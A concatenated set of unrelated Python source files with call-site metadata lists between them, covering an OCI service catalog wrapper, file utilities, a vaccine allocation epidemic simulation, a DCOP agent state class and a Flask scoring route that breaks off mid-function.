_make_path, SKIP_IN_PATH\n'), ((16643, 16728), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""influencers"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'influencers')\n", (16653, 16728), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17291, 17343), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (17301, 17343), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17909, 17961), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (17919, 17961), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((18298, 18363), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_stats"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_stats')\n", (18308, 18363), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((19127, 19229), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id', '"""_revert"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id, '_revert')\n", (19137, 19229), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20259, 20350), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id)\n", (20269, 20350), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20941, 21032), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id)\n", (20951, 21032), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n')] |
LaudateCorpus1/oci-python-sdk | src/oci/service_catalog/service_catalog_client_composite_operations.py | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class ServiceCatalogClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.service_catalog.ServiceCatalogClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, **kwargs):
"""
Creates a new ServiceCatalogClientCompositeOperations object
:param ServiceCatalogClient client:
The service client which will be wrapped by this object
"""
self.client = client
def change_private_application_compartment_and_wait_for_state(self, private_application_id, change_private_application_compartment_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.ChangePrivateApplicationCompartmentDetails change_private_application_compartment_details: (required)
The details of the request to change the compartment of a given private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_private_application_compartment(private_application_id, change_private_application_compartment_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_private_application_and_wait_for_state(self, create_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param oci.service_catalog.models.CreatePrivateApplicationDetails create_private_application_details: (required)
Private application creation details.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_private_application(create_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_service_catalog_and_wait_for_state(self, create_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param oci.service_catalog.models.CreateServiceCatalogDetails create_service_catalog_details: (required)
The details for creating a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_service_catalog(create_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_private_application_and_wait_for_state(self, private_application_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = None
try:
operation_result = self.client.delete_private_application(private_application_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_service_catalog_and_wait_for_state(self, service_catalog_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_service_catalog(service_catalog_id)
operation_result = None
try:
operation_result = self.client.delete_service_catalog(service_catalog_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_private_application_and_wait_for_state(self, private_application_id, update_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.UpdatePrivateApplicationDetails update_private_application_details: (required)
The details for updating the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_private_application(private_application_id, update_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_service_catalog_and_wait_for_state(self, service_catalog_id, update_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param oci.service_catalog.models.UpdateServiceCatalogDetails update_service_catalog_details: (required)
Details to update for a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_service_catalog(service_catalog_id, update_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
| [((3626, 3713), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (3664, 3713), False, 'import oci\n'), ((5780, 5867), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (5818, 5867), False, 'import oci\n'), ((7932, 8019), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (7970, 8019), False, 'import oci\n'), ((10228, 10315), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (10266, 10315), False, 'import oci\n'), ((12549, 12636), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (12587, 12636), False, 'import oci\n'), ((14881, 14968), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (14919, 14968), False, 'import oci\n'), ((17180, 17267), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (17218, 17267), False, 'import oci\n')] |
BrianOfrim/boja | vision/_file_utils.py | 6571fbbfb7f015e96e80e822d9dc96b4636b4119 | from typing import List
import os
import re
def create_output_dir(dir_name) -> bool:
if not os.path.isdir(dir_name) or not os.path.exists(dir_name):
print("Creating output directory: %s" % dir_name)
try:
os.makedirs(dir_name)
except OSError:
print("Creation of the directory %s failed" % dir_name)
return False
else:
print("Successfully created the directory %s " % dir_name)
return True
else:
return True
def get_files_from_dir(dir_path: str, file_type: str = None) -> List[str]:
if not os.path.isdir(dir_path):
return []
file_paths = [
f for f in os.listdir(dir_path) if os.path.isfile(os.path.join(dir_path, f))
]
if file_type is not None:
file_paths = [f for f in file_paths if f.lower().endswith(file_type.lower())]
return file_paths
def _int_string_sort(file_name) -> int:
match = re.match("[0-9]+", os.path.basename(file_name))
if not match:
return 0
return int(match[0])
def get_highest_numbered_file(
dir_path: str, file_type: str = None, filter_keyword=None
) -> str:
file_names = get_files_from_dir(dir_path)
if file_type is not None:
file_names = [
file_name
for file_name in file_names
if file_name.lower().endswith(file_type.lower())
]
if filter_keyword is not None:
file_names = [
file_name
for file_name in file_names
if filter_keyword.lower() in file_name.lower()
]
if len(file_names) == 0:
return None
highest_numbered_file = sorted(file_names, key=_int_string_sort, reverse=True)[0]
return os.path.join(dir_path, highest_numbered_file)
| [((1730, 1775), 'os.path.join', 'os.path.join', (['dir_path', 'highest_numbered_file'], {}), '(dir_path, highest_numbered_file)\n', (1742, 1775), False, 'import os\n'), ((604, 627), 'os.path.isdir', 'os.path.isdir', (['dir_path'], {}), '(dir_path)\n', (617, 627), False, 'import os\n'), ((968, 995), 'os.path.basename', 'os.path.basename', (['file_name'], {}), '(file_name)\n', (984, 995), False, 'import os\n'), ((98, 121), 'os.path.isdir', 'os.path.isdir', (['dir_name'], {}), '(dir_name)\n', (111, 121), False, 'import os\n'), ((129, 153), 'os.path.exists', 'os.path.exists', (['dir_name'], {}), '(dir_name)\n', (143, 153), False, 'import os\n'), ((238, 259), 'os.makedirs', 'os.makedirs', (['dir_name'], {}), '(dir_name)\n', (249, 259), False, 'import os\n'), ((685, 705), 'os.listdir', 'os.listdir', (['dir_path'], {}), '(dir_path)\n', (695, 705), False, 'import os\n'), ((724, 749), 'os.path.join', 'os.path.join', (['dir_path', 'f'], {}), '(dir_path, f)\n', (736, 749), False, 'import os\n')] |
COVID-IWG/epimargin-studies | vaccine_allocation/epi_simulations.py | 7d4a78e2e6713c6a0aea2cd2440529153e9a635d | import dask
import numpy as np
import pandas as pd
from epimargin.models import Age_SIRVD
from epimargin.utils import annually, normalize, percent, years
from studies.vaccine_allocation.commons import *
from tqdm import tqdm
import warnings
warnings.filterwarnings("error")
num_sims = 1000
simulation_range = 1 * years
phi_points = [_ * percent * annually for _ in (25, 50, 100, 200)]
simulation_initial_conditions = pd.read_csv(data/f"all_india_coalesced_scaling_Apr15.csv")\
.drop(columns = ["Unnamed: 0"])\
.set_index(["state", "district"])
rerun_states = ["Telangana", "Uttarakhand", "Jharkhand", "Arunachal Pradesh", "Nagaland", "Sikkim"] + coalesce_states
districts_to_run = simulation_initial_conditions
num_age_bins = 7
seed = 0
MORTALITY = [6, 5, 4, 3, 2, 1, 0]
CONTACT = [1, 2, 3, 4, 0, 5, 6]
CONSUMPTION = [4, 5, 6, 3, 2, 1, 0]
def save_metrics(tag, policy, dst = tev_src):
np.savez_compressed(dst/f"{tag}.npz",
dT = policy.dT_total,
dD = policy.dD_total,
pi = policy.pi,
q0 = policy.q0,
q1 = policy.q1,
Dj = policy.D
)
def prioritize(num_doses, S, prioritization):
Sp = S[:, prioritization]
dV = np.where(Sp.cumsum(axis = 1) <= num_doses, Sp, 0)
dV[np.arange(len(dV)), (Sp.cumsum(axis = 1) > dV.cumsum(axis = 1)).argmax(axis = 1)] = num_doses - dV.sum(axis = 1)
return dV[:, sorted(range(len(prioritization)), key = prioritization.__getitem__)].clip(0, S)
def process(district_data):
(
(state, district), state_code,
sero_0, N_0, sero_1, N_1, sero_2, N_2, sero_3, N_3, sero_4, N_4, sero_5, N_5, sero_6, N_6, N_tot,
Rt, Rt_upper, Rt_lower, S0, I0, R0, D0, dT0, dD0, V0, T_ratio, R_ratio
) = district_data
try:
S0 = int(S0)
except ValueError as e:
print (state, district, e)
return
Sj0 = np.array([(1 - sj) * Nj for (sj, Nj) in zip([sero_0, sero_1, sero_2, sero_3, sero_4, sero_5, sero_6], [N_0, N_1, N_2, N_3, N_4, N_5, N_6])])
# distribute historical doses assuming mortality prioritization
Sj0 = prioritize(V0, Sj0.copy()[None, :], MORTALITY)[0]
def get_model(seed = 0):
model = Age_SIRVD(
name = state_code + "_" + district,
population = N_tot - D0,
dT0 = (np.ones(num_sims) * dT0).astype(int),
Rt0 = 0 if S0 == 0 else Rt * N_tot / S0,
S0 = np.tile( Sj0, num_sims).reshape((num_sims, -1)),
I0 = np.tile((fI * I0).T, num_sims).reshape((num_sims, -1)),
R0 = np.tile((fR * R0).T, num_sims).reshape((num_sims, -1)),
D0 = np.tile((fD * D0).T, num_sims).reshape((num_sims, -1)),
mortality = np.array(list(OD_IFRs.values())),
infectious_period = infectious_period,
random_seed = seed,
)
model.dD_total[0] = np.ones(num_sims) * dD0
model.dT_total[0] = np.ones(num_sims) * dT0
return model
for phi in phi_points:
num_doses = phi * (S0 + I0 + R0)
sim_tag = f"{state_code}_{district}_phi{int(phi * 365 * 100)}_"
random_model, mortality_model, contact_model, no_vax_model = [get_model(seed) for _ in range(4)]
for t in range(simulation_range):
if t <= 1/phi:
dV_random = num_doses * normalize(random_model.N[-1], axis = 1).clip(0)
dV_mortality = prioritize(num_doses, mortality_model.N[-1], MORTALITY ).clip(0)
dV_contact = prioritize(num_doses, contact_model.N[-1], CONTACT ).clip(0)
else:
dV_random, dV_mortality, dV_contact = np.zeros((num_sims, 7)), np.zeros((num_sims, 7)), np.zeros((num_sims, 7))
random_model .parallel_forward_epi_step(dV_random, num_sims = num_sims)
mortality_model.parallel_forward_epi_step(dV_mortality, num_sims = num_sims)
contact_model .parallel_forward_epi_step(dV_contact, num_sims = num_sims)
no_vax_model .parallel_forward_epi_step(dV = np.zeros((7, num_sims))[:, 0], num_sims = num_sims)
if phi == phi_points[0]:
save_metrics(sim_tag + "novax", no_vax_model )
save_metrics(sim_tag + "random", random_model )
save_metrics(sim_tag + "mortality", mortality_model)
save_metrics(sim_tag + "contact", contact_model )
if __name__ == "__main__":
distribute = False
if distribute:
with dask.config.set({"scheduler.allowed-failures": 1}):
client = dask.distributed.Client(n_workers = 1, threads_per_worker = 1)
print(client.dashboard_link)
with dask.distributed.get_task_stream(client) as ts:
futures = []
for district in districts_to_run.itertuples():
futures.append(client.submit(process, district, key = ":".join(district[0])))
dask.distributed.progress(futures)
else:
failures = []
for t in tqdm(districts_to_run.itertuples(), total = len(districts_to_run)):
process(t)
# try:
# process(t)
# except Exception as e:
# failures.append((e, t))
for failure in failures:
print(failure)
| [((242, 274), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""error"""'], {}), "('error')\n", (265, 274), False, 'import warnings\n'), ((937, 1076), 'numpy.savez_compressed', 'np.savez_compressed', (["(dst / f'{tag}.npz')"], {'dT': 'policy.dT_total', 'dD': 'policy.dD_total', 'pi': 'policy.pi', 'q0': 'policy.q0', 'q1': 'policy.q1', 'Dj': 'policy.D'}), "(dst / f'{tag}.npz', dT=policy.dT_total, dD=policy.\n dD_total, pi=policy.pi, q0=policy.q0, q1=policy.q1, Dj=policy.D)\n", (956, 1076), True, 'import numpy as np\n'), ((2950, 2967), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (2957, 2967), True, 'import numpy as np\n'), ((3002, 3019), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (3009, 3019), True, 'import numpy as np\n'), ((4548, 4598), 'dask.config.set', 'dask.config.set', (["{'scheduler.allowed-failures': 1}"], {}), "({'scheduler.allowed-failures': 1})\n", (4563, 4598), False, 'import dask\n'), ((4621, 4679), 'dask.distributed.Client', 'dask.distributed.Client', ([], {'n_workers': '(1)', 'threads_per_worker': '(1)'}), '(n_workers=1, threads_per_worker=1)\n', (4644, 4679), False, 'import dask\n'), ((4992, 5026), 'dask.distributed.progress', 'dask.distributed.progress', (['futures'], {}), '(futures)\n', (5017, 5026), False, 'import dask\n'), ((433, 493), 'pandas.read_csv', 'pd.read_csv', (["(data / f'all_india_coalesced_scaling_Apr15.csv')"], {}), "(data / f'all_india_coalesced_scaling_Apr15.csv')\n", (444, 493), True, 'import pandas as pd\n'), ((4742, 4782), 'dask.distributed.get_task_stream', 'dask.distributed.get_task_stream', (['client'], {}), '(client)\n', (4774, 4782), False, 'import dask\n'), ((3722, 3745), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3730, 3745), True, 'import numpy as np\n'), ((3747, 3770), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3755, 3770), True, 'import numpy as np\n'), ((3772, 3795), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3780, 3795), True, 'import numpy as np\n'), ((2467, 2489), 'numpy.tile', 'np.tile', (['Sj0', 'num_sims'], {}), '(Sj0, num_sims)\n', (2474, 2489), True, 'import numpy as np\n'), ((2549, 2579), 'numpy.tile', 'np.tile', (['(fI * I0).T', 'num_sims'], {}), '((fI * I0).T, num_sims)\n', (2556, 2579), True, 'import numpy as np\n'), ((2631, 2661), 'numpy.tile', 'np.tile', (['(fR * R0).T', 'num_sims'], {}), '((fR * R0).T, num_sims)\n', (2638, 2661), True, 'import numpy as np\n'), ((2713, 2743), 'numpy.tile', 'np.tile', (['(fD * D0).T', 'num_sims'], {}), '((fD * D0).T, num_sims)\n', (2720, 2743), True, 'import numpy as np\n'), ((4135, 4158), 'numpy.zeros', 'np.zeros', (['(7, num_sims)'], {}), '((7, num_sims))\n', (4143, 4158), True, 'import numpy as np\n'), ((2341, 2358), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (2348, 2358), True, 'import numpy as np\n'), ((3405, 3442), 'epimargin.utils.normalize', 'normalize', (['random_model.N[-1]'], {'axis': '(1)'}), '(random_model.N[-1], axis=1)\n', (3414, 3442), False, 'from epimargin.utils import annually, normalize, percent, years\n')] |
nandofioretto/py_dcop | src/core/agent_state.py | fb2dbc97b69360f5d1fb67d84749e44afcdf48c3 | '''Every agent has an agent state, which is its local view of the world'''
import numpy as np
import itertools
class AgentState:
def __init__(self, name, agt, seed=1234):
self.name = name
self.prng = np.random.RandomState(seed)
# contains the variable assignment (exploreD) for this agent and its neighbors
self.variables_assignments = {var.name: var.value for var in agt.variables}
self.this_agt = agt
## Data structures to explore assignment local to an agent
self.my_vars = [var.name for var in agt.variables]
# the iterator to all possible assignment for this agent
self.assignment_it = 0
# All possible assignments for the variables of this agent
domains = [var.domain for var in agt.variables]
self.agt_assignments_list = list(itertools.product(*domains))
def addNeighborsVariables(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def recvNeighborsValues(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def copyAgtAssignmentToState(self):
for var in self.this_agt.variables:
self.variables_assignments[var.name] = var.value
def nextAssignment(self):
'''
If a next assignment for the agent local variables exists, then assign it
:var self.variables_assignments and return True. Otherwise return False.
'''
if self.assignment_it < len(self.agt_assignments_list):
self.setAssignmentIt(self.assignment_it)
self.assignment_it += 1
return True
else:
# Reset iterator
self.assignment_it = 0
return False
def setAssignmentIt(self, it):
for i, var_name in enumerate(self.my_vars):
self.variables_assignments[var_name] = self.agt_assignments_list[it][i] | [((221, 248), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (242, 248), True, 'import numpy as np\n'), ((837, 864), 'itertools.product', 'itertools.product', (['*domains'], {}), '(*domains)\n', (854, 864), False, 'import itertools\n')] |
Sonictherocketman/cache-proxy | johnny_cache/__init__.py | 75650fb143b365e922c03f87e388c5710ad21799 | from .server import app # noqa
| [] |
usgs/neversink_workflow | python_packages_static/flopy/mf6/__init__.py | acd61435b8553e38d4a903c8cd7a3afc612446f9 | # imports
from . import coordinates
from . import data
from .modflow import *
from . import utils
from .data import mfdatascalar, mfdatalist, mfdataarray
from .mfmodel import MFModel
from .mfbase import ExtFileAction
| [] |
issuu/jmespath | tests/__init__.py | 7480643df8ad0c99269b1fa6b9e793582bcb7efe | import sys
# The unittest module got a significant overhaul
# in 2.7, so if we're in 2.6 we can use the backported
# version unittest2.
if sys.version_info[:2] == (2, 6):
import unittest2 as unittest
import simplejson as json
from ordereddict import OrderedDict
else:
import unittest
import json
from collections import OrderedDict
| [] |
jtillman20/cfb-data-api | src/routes/scoring.py | 69bcae225e4fa0616eb526bd608e20ace17f1816 | from typing import Union
from flask import request
from flask_restful import Resource
from exceptions import InvalidRequestError
from models import Scoring
from utils import flask_response, rank, sort
class ScoringRoute(Resource):
@flask_response
def get(self, side_of_ball: str) -> Union[Scoring, list[Scoring]]:
"""
GET request to get scoring offense or defense for the given years.
If team is provided only get scoring data for that team.
Args:
side_of_ball (str): Offense or defense
Returns:
Union[Scoring, list[Scoring]]: Scoring data for all teams
or only scoring data for one team
"""
if side_of_ball not in ['offense', 'defense']:
raise InvalidRequestError(
"Side of ball must be either 'offense' or 'defense'")
sort_attr = request.args.get('sort', 'points_per_game')
secondary_attr, secondary_reverse = secondary_sort(
attr=sort_attr, side_of_ball=side_of_ball)
try:
start_year = int(request.args['start_year'])
except KeyError:
raise InvalidRequestError(
'Start year is a required query parameter')
except ValueError:
raise InvalidRequestError(
'Query parameter start year must be an integer')
end_year = request.args.get('end_year')
team = request.args.get('team')
if end_year is not None:
try:
end_year = int(end_year)
except ValueError:
raise InvalidRequestError(
'Query parameter end year must be an integer')
scoring = Scoring.get_scoring(
side_of_ball=side_of_ball,
start_year=start_year,
